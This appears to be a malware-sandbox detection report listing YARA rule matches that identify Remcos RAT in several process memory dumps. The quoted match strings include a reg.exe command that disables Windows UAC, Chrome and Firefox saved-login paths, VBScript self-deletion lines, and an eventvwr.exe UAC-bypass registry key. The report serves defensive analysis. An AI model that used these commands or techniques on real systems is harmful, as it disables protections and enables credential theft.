Process Memory Space: GoogleUpdate.exe PID: 7844	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xda91:$a1: Remcos restarted by watchdog! 0x18856:$a1: Remcos restarted by watchdog! 0xdfc8:$a3: %02i:%02i:%02i:%03i 0xe581:$a3: %02i:%02i:%02i:%03i 0x18d8d:$a3: %02i:%02i:%02i:%03i 0x19346:$a3: %02i:%02i:%02i:%03i 0xe1ea:$a4: * Remcos v 0x18faf:$a4: * Remcos v
Click to see the 58 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
20.2.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
20.2.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
18.0.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.0.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
18.0.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
18.0.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
22.0.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
22.0.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
22.0.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
22.0.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
10.2.GoogleUpdate.exe.2a00000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.GoogleUpdate.exe.2a00000.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
10.2.GoogleUpdate.exe.2a00000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
10.2.GoogleUpdate.exe.2a00000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
13.2.svchost.exe.2d50000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.svchost.exe.2d50000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
13.2.svchost.exe.2d50000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
13.2.svchost.exe.2d50000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
13.2.svchost.exe.2d50000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.svchost.exe.2d50000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
13.2.svchost.exe.2d50000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
13.2.svchost.exe.2d50000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
27.0.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
27.0.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
27.0.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
22.2.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
27.0.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
22.2.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
22.2.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
22.2.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
15.2.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
15.2.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
15.2.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
25.0.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
25.0.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
25.0.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
25.0.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
10.2.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
10.2.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
10.2.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
15.0.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.0.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
15.0.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
15.0.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
0.0.DB5rQYsfd6.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.0.DB5rQYsfd6.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
0.0.DB5rQYsfd6.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
0.0.DB5rQYsfd6.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
27.2.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
27.2.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
27.2.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
27.2.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
0.2.DB5rQYsfd6.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.DB5rQYsfd6.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
